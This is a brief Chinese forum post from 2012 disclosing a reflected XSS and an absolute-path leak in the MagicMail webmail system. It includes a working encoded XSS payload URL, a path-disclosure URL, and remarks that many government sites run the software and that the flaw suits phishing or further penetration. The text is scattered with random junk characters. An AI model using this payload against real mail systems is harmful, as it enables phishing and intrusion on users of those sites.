今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞9 d7 `4 _6 G% I) F
% w+ F+ x5 F- S' Y
' a/ q$ [8 z4 b, G- ~$ a$ X) i
包含 一个反射性XSS 以及 绝对路径泄漏
+ H+ J, Z' B) w; ` V) v看了看 貌似全部是linux的。4 K* |5 R# I$ }1 i4 o
1 S" b( }* [0 f6 J% y( H关键字:迈捷邮件系统 by MagicMail
Q4 G' D) {# _. w/ S9 V8 [' ]- P2 h- k! J/ `1 ~! t& S9 `& k4 H) u7 t6 D! m
可以看到很多政府网站都用这个邮件系统# \" x% C7 l/ b
" b4 l" Q. X) M _7 [$ H8 w( Q5 A% V绝对路径 http://madman.in/index.php?login_type=declare&language=1 _0 P+ R; A* N
' K7 x# e/ g* e; G, D7 q/ \9 j) { e( }
2 ^: [$ [9 {, c/ v/ mXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E7 ?- `4 C3 K% a! S* O: V
8 B6 O- D8 b: b6 n( `+ j6 \! D. n# d. W& X2 P: ^0 t$ r! p9 [
}( E( B6 s0 s, ]
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
) D$ c5 R$ O, Z; d* h% g - j( E; N5 Z3 A; l* _
修复方案:看官方补丁吧。
' ]. ]0 I8 v) k2 f |
发表于 2012-11-9 20:38:41
收藏
支持
反对